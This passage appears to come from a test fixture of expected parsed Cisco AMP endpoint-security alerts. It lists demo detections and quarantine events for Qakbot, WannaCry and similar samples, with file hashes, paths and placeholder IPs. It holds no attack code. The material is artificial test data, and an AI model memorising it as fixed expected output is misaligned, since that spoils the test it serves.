"/C:/Windows/SysWOW64/cmd.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 13751, + 
"process.hash.sha256": "8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75", + "related.hash": [ + "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:27:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "df:d1:ed:2d:c8:fc" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296278, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "df:d1:ed:2d:c8:fc" + ], + "cisco.amp.timestamp_nanoseconds": 268148295, + "event.action": "Threat Detected in Low Prevalence Executable", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 1458626002840536600, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "file.name": "report.pdf.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Low_Prev_Retro", + "host.name": "Demo_Low_Prev_Retro", + "input.type": "log", + "log.offset": 15508, + "related.hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" + ], + "related.hosts": [ + "Demo_Low_Prev_Retro" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:19:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ 
+ { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 161000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6583861114428195000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 16640, + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:11:04.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "df:d1:ed:2d:c8:fc" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648173, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "df:d1:ed:2d:c8:fc" + ], + "cisco.amp.timestamp_nanoseconds": 27000000, + "event.action": "File Fetch Completed", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6264747552596296000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "file.hash.md5": "48a0bf05b9706a00d2a0ff6260412f11", + "file.hash.sha1": "5058b16a86beee96927371210b9a9f682976a50a", + "file.hash.sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "file.name": "report.pdf.exe", + "file.path": "\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe", + "fileset.name": "amp", + 
"host.hostname": "Demo_Low_Prev_Retro", + "host.name": "Demo_Low_Prev_Retro", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 17570, + "related.hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "48a0bf05b9706a00d2a0ff6260412f11", + "5058b16a86beee96927371210b9a9f682976a50a" + ], + "related.hosts": [ + "Demo_Low_Prev_Retro" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:02:58.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "d1:e2:b6:61:ef:7a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Auto.A280012EEE.in10.tht.Talos", + "cisco.amp.detection_id": "6411444887895408641", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "d1:e2:b6:61:ef:7a" + ], + "cisco.amp.timestamp_nanoseconds": 756000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411444887895409000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "a659ff79ef7ffacbd61d4c2641379e44", + "file.hash.sha1": "c235e18bae63d6c4b5daadb833686f943de65a5f", + "file.hash.sha256": "a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62", + "file.name": "X4.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Documents\\X4.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_2", + "host.name": "Demo_Qakbot_2", + "host.os.family": "windows", + "host.os.platform": "windows", + 
"host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 18818, + "process.hash.md5": "045451fa238a75305cc26ac982472367", + "process.hash.sha1": "2131cff0959d213cd9a5e8a8ac362d265d5b1316", + "process.hash.sha256": "9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97", + "process.name": "wscript.exe", + "process.pid": 4744, + "related.hash": [ + "a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62", + "a659ff79ef7ffacbd61d4c2641379e44", + "c235e18bae63d6c4b5daadb833686f943de65a5f" + ], + "related.hosts": [ + "Demo_Qakbot_2" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:58:57.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419187549993959449", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 208000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419187549993959000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 21536, + 
"related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:58:54.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419187537109057560", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 853000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419187537109058000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 24252, + "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "process.hash.sha256": 
"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 2980, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:49:08.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 562000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6583853374897127000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 26979, + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:41:12.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": 
"W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.event_type_id": 1107296272, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 496121997, + "event.action": "Executed malware", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 14945825043963, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-14T11:41:12.000Z", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 27909, + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:41:12.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.event_type_id": 1107296258, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 498576872, + "event.action": "Multiple Infected Files", + "event.category": [ + "malware" + ], + 
"event.dataset": "cisco.amp", + "event.id": 14945825043964, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-14T11:41:12.000Z", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 29220, + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:28:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "d2:78:15:4a:f4:a2" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6533671595485954049", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "d2:78:15:4a:f4:a2" + ], + "cisco.amp.timestamp_nanoseconds": 440000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533671599780921000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Exploit_Prevention_Audit", + "host.name": "Demo_AMP_Exploit_Prevention_Audit", + "input.type": "log", + "log.offset": 30538, + "related.hash": [ + 
"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79" + ], + "related.hosts": [ + "Demo_AMP_Exploit_Prevention_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179222052372503", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 453000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179222052372000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 32991, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + 
"cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179217757405206", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 875000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179217757405000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 35457, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179213462437901", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" 
+ ], + "cisco.amp.timestamp_nanoseconds": 361000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179217757405000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 36650, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179204872503300", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 329000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179217757405000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": 
"log", + "log.offset": 37836, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179204872503298", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 329000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179217757405000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 40302, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": 
"53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179204872503301", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 329000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179217757405000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 41422, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419179213462437902", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 893000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179213462438000, + "event.kind": 
"alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 42542, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419179213462437899", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 456000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179213462438000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": 
